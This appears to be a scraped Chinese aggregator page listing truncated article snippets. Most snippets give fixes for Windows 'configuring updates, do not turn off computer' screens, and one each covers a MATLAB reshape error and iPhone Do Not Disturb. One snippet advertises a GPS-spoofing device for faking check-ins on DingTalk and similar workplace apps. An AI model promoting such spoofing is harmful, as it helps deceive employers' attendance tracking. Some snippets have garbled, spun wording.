2024/4/27 20:28:35 - 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...
解析如下:1、长按电脑电源键直至关机,然后再按一次电源健重启电脑,按F8健进入安全模式2、安全模式下进入Windows系统桌面后,按住“winR”打开运行窗口,输入“services.msc”打开服务设置3、在服务界面,选中…...
2022/11/19 21:17:18 - 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。
%读入6幅图像(每一幅图像的大小是564*564) f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...
2022/11/19 21:17:16 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...
win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面,在等待界面中我们需要等待操作结束才能关机,虽然这比较麻烦,但是对系统进行配置和升级…...
2022/11/19 21:17:15 - 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...
有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows,请勿关闭计算机”的提示,要过很久才能进入系统,有的用户甚至几个小时也无法进入,下面就教大家这个问题的解决方法。第一种方法:我们首先在左下角的“开始…...
2022/11/19 21:17:14 - win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...
置信有很多用户都跟小编一样遇到过这样的问题,电脑时发现开机屏幕显现“正在配置Windows Update,请勿关机”(如下图所示),而且还需求等大约5分钟才干进入系统。这是怎样回事呢?一切都是正常操作的,为什么开时机呈现“正…...
2022/11/19 21:17:13 - 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...
Win7系统开机启动时总是出现“配置Windows请勿关机”的提示,没过几秒后电脑自动重启,每次开机都这样无法进入系统,此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一:开机按下F8,在出现的Windows高级启动选…...
2022/11/19 21:17:12 - 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...
有不少windows10系统用户反映说碰到这样一个情况,就是电脑提示正在准备windows请勿关闭计算机,碰到这样的问题该怎么解决呢,现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法:1、2、依次…...
2022/11/19 21:17:11 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...
今天和大家分享一下win7系统重装了Win7旗舰版系统后,每次关机的时候桌面上都会显示一个“配置Windows Update的界面,提示请勿关闭计算机”,每次停留好几分钟才能正常关机,导致什么情况引起的呢?出现配置Windows Update…...
2022/11/19 21:17:10 - 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...
只能是等着,别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚,只能是考虑备份数据后重装系统了。解决来方案一:管理员运行cmd:net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...
2022/11/19 21:17:09 - 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?
原标题:电脑提示“配置Windows Update请勿关闭计算机”怎么办?win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢?一般的方…...
2022/11/19 21:17:08 - 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...
关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!关机提示 windows7 正在配…...
2022/11/19 21:17:05 - 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...
钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...
2022/11/19 21:17:05 - 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...
前几天班里有位学生电脑(windows 7系统)出问题了,具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面,长时间没反应,无法进入系统。这个问题原来帮其他同学也解决过,网上搜了不少资料&#x…...
2022/11/19 21:17:04 - 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...
本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法,并在最后教给你1种保护系统安全的好方法,一起来看看!电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中,添加了1个新功能在“磁…...
2022/11/19 21:17:03 - 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...
许多用户在长期不使用电脑的时候,开启电脑发现电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机。。.这要怎么办呢?下面小编就带着大家一起看看吧!如果能够正常进入系统,建议您暂时移…...
2022/11/19 21:17:02 - 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...
配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!配置windows update失败 还原更改 请勿关闭计算机&#x…...
2022/11/19 21:17:01 - 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...
不知道大家有没有遇到过这样的一个问题,就是我们的win7系统在关机的时候,总是喜欢显示“准备配置windows,请勿关机”这样的一个页面,没有什么大碍,但是如果一直等着的话就要两个小时甚至更久都关不了机,非常…...
2022/11/19 21:17:00 - 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...
当电脑出现正在准备配置windows请勿关闭计算机时,一般是您正对windows进行升级,但是这个要是长时间没有反应,我们不能再傻等下去了。可能是电脑出了别的问题了,来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...
2022/11/19 21:16:59 - 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...
我们使用电脑的过程中有时会遇到这种情况,当我们打开电脑之后,发现一直停留在一个界面:“配置Windows Update失败,还原更改请勿关闭计算机”,等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢࿰…...
2022/11/19 21:16:58 - 如何在iPhone上关闭“请勿打扰”
Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...
2022/11/19 21:16:57